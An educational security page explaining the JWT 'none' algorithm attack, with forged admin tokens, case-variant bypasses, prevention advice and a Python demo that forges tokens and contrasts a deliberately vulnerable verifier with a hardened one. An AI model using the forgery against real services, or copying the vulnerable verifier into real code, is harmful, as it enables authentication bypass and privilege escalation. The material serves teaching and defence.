JWT None Algorithm Attack

JWT None Algorithm Attack exploits JWT implementations that accept tokens whose header declares the algorithm "none". This "Unsecured JWT" (RFC 7519 section 6, using the "none" JWS algorithm from RFC 7518) was intended for contexts where integrity is guaranteed by other means, such as a token that never leaves a trusted channel, but vulnerable libraries take the alg value from the untrusted header itself and accept the token without any verification.

How It Works

The attacker takes an existing JWT, changes the claims in the payload (for example admin: true), sets the alg header to "none" (or a case variant such as "None", "NONE" or "nOnE" when the library compares the value case-insensitively), and removes the signature, leaving the third segment empty. A vulnerable server reads alg from the header, sees "none", and skips signature verification entirely, so the modified claims are trusted as if they had been signed.

Example

// Original signed token
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOmZhbHNlfQ.
[valid_signature]

// Forged token with none algorithm
{"alg": "none", "typ": "JWT"}
{"sub": "user", "admin": true}

// Encoded (note: empty signature, trailing dot)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOnRydWV9.

// Or without trailing dot (some libraries)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOnRydWV9

Bypass Variants

  • "alg": "none"
  • "alg": "None"
  • "alg": "NONE"
  • "alg": "nOnE" (any other case variation, effective against libraries that lower-case or case-insensitively compare the value)

Prevention

  • Explicitly reject "none" (and every case variant of it) during verification
  • Whitelist the expected algorithm(s) on the server side and pass them to the verify call; never let the token's own alg header decide how it is verified
  • Use updated JWT libraries (most now reject "none" by default, but check how the version you ship behaves)
  • Always require signature verification: treat a missing or empty third segment as a failed check, not as "no signature needed"
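The forgery described above, together with a vulnerable and a hardened verifier side by side, as an added example that is not part of the original page. It uses only the Python standard library (no PyJWT); the secret, the sign_hs256/forge_none_token/verify_* function names and the ALLOWED_ALGS constant are assumptions made for the demonstration. The hard-coded tokens it produces match the segments shown in the Example section.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real server loads this from configuration.
SECRET = b"demo-secret-not-for-production"

# Hardened verifier only ever accepts these algorithms, chosen by the server,
# never by the token.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(data: bytes) -> str:
    """base64url without '=' padding, as JWS requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; re-adds the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _encode_parts(header: dict, payload: dict) -> str:
    """header.payload with compact JSON (no spaces), the usual JWT encoding."""
    compact = lambda obj: json.dumps(obj, separators=(",", ":")).encode()
    return b64url_encode(compact(header)) + "." + b64url_encode(compact(payload))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Produce a legitimately signed HS256 token."""
    signing_input = _encode_parts(header, payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none_token(token: str, alg_value: str = "none",
                     trailing_dot: bool = True, **payload_changes) -> str:
    """Attacker step: rewrite claims, set alg to a 'none' variant, drop the signature.
    trailing_dot=False produces the two-segment form some libraries accept."""
    header_b64, payload_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = alg_value
    payload.update(payload_changes)
    forged = _encode_parts(header, payload)
    return forged + "." if trailing_dot else forged


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable verifier: trusts alg from the token and compares it
    case-insensitively, so 'none', 'None', 'NONE' and 'nOnE' all skip the
    signature check. Returns the payload if accepted, None if rejected."""
    parts = token.split(".")
    if len(parts) == 2:  # tolerate a missing trailing dot
        parts.append("")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    alg = str(header.get("alg", "")).lower()
    if alg == "none":  # the bug: an attacker-chosen header disables verification
        return json.loads(b64url_decode(payload_b64))
    if alg == "hs256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Hardened verifier: exactly three segments, non-empty signature, alg must be
    in the server-side whitelist (case-sensitive), and the HMAC is always checked."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in ALLOWED_ALGS:
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    legit = sign_hs256({"alg": "HS256", "typ": "JWT"},
                       {"sub": "user", "admin": False}, SECRET)
    for variant in ("none", "None", "NONE", "nOnE"):
        forged = forge_none_token(legit, alg_value=variant, admin=True)
        print(variant, "vulnerable:", verify_vulnerable(forged, SECRET),
              "hardened:", verify_hardened(forged, SECRET))
```

Running the script shows each case variant yielding {"sub": "user", "admin": True} from the vulnerable verifier and None from the hardened one. The hardened version never consults the token to decide how to verify it: the algorithm set is fixed in ALLOWED_ALGS, so even a header that spells the accepted algorithm correctly still has to carry a valid HMAC.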
